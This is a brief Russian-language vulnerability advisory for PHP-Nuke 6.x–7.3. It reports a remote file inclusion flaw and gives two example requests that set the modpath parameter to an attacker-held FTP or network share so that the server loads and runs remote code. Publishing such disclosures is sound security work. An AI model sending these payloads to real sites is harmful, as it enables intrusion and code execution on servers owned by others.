Программа: PHP-Nuke 6.x — 7.3 

Уязвимость включения файла обнаружена в PHP-Nuke. Удаленный пользователь может выполнить произвольный код на целевой системе. 

Пример:

http://localhost/nuke73/index.php?modpath =ftp://[attacker]/directory/
http://localhost/nuke73/index.php?modpath =//attacke r_ip/share_name/



Оставить мнение